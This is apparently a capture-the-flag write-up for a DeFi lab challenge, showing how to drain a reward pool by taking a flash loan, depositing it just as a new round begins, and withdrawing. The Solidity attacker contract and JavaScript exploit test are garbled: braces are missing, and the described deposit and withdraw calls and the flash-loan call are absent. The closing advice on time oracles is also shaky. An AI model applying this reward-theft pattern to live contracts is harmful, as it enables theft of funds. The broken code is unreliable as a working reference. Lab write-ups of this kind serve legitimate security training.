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The goal of this box is to get rewards out of the rewarder pool without depositing a single token.

Code Breakdown

To do so, we'll have to look at the following contracts


Let's start by looking at the important functions.

function flashLoan(uint256 amount) external nonRentrant

Like any other flash loan function, it requires the sender to be a contract and the contract must have a function receiveFlashLoan(uint256)

Why does your attacker contract requires receiveFlashLoan (uint256)? In the flashLoan function, it calls for it explicity.


The next contract we'll be looking at is TheRewarderPool.sol

Let's start by looking at the important functions.

function deposit(uint256 amountToDeposit) external

This is a simple function where users will deposit their tokens. It'll call for a distributeRewards() whenever a deposit is made to check if it's time for reward distribution.

function withdraw(uint256 amountToWithdraw) external

This is a function where user can withdraw their token

function distributeRewards() public returns (uint256)

This function will check for distribute the reward evenly among the depositers according to contributions.

function isNewRewardsRound() public view returns (bool)

To check if a new round is issued every 5 days.


There are 2 variables to consider - Ensure new round has started, Flashloan, deposit and steal rewards under the same contract.

Here's the thought process when you're crafting the attacker contract

1) Send a command to the block to fast forward time by 5 days 2) Flashloan the tokens, deposit them, withdraw and return the tokens within the same function. 3) Transfer the reward tokens to the attacker address


Following the hints above, your smart contract should look similar to this.

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

import "../the-rewarder/TheRewarderPool.sol";
import "../the-rewarder/FlashLoanerPool.sol";
import "../DamnValuableToken.sol";
import "./RewardToken.sol";
import "./AccountingToken.sol";

 * @title Attacker
 * @author BingleBangle-BH

 contract Attacker {

    using Address for address payable;

    address payable private pool;

    FlashLoanerPool public flash_pool;
    TheRewarderPool public reward_pool;
    RewardToken public reward_token;
    DamnValuableToken public liquidity_token;

    constructor(address _flash_pool, address _reward_pool, address _reward_token, address _tokenAddress) {
        flash_pool = FlashLoanerPool(_flash_pool);
        reward_pool = TheRewarderPool(_reward_pool);
        reward_token = RewardToken(_reward_token);
        liquidity_token = DamnValuableToken(_tokenAddress);

    function receiveFlashLoan(uint256 amount) public payable {
        liquidity_token.approve(address(reward_pool), amount);
        liquidity_token.transfer(address(flash_pool), amount);

    function stealRewards() external{
        uint256 dvtPoolBalance = liquidity_token.balanceOf(address(flash_pool));
        reward_token.transfer(msg.sender, reward_token.balanceOf(address(this)));


Here's the javascript

it('Exploit', async function () {

    // Advance time 5 days so that depositors can get rewards
    await ethers.provider.send("evm_increaseTime", [5 * 24 * 60 * 60]); 

    //Deploy attacker contract
    const attacker_pool = await ethers.getContractFactory('Attacker', attacker);
    this.attack = await attacker_pool.deploy(this.flashLoanPool.address, 
    await this.attack.stealRewards();

    balance = await this.rewardToken.balanceOf(attacker.address);


Do not use block.timestamp or block.number as an indicator to manage the number of rounds or time in your contract. Consider using external oracle service that provides time information such as Chainlink, TimezoneDB or WorldClockAPI.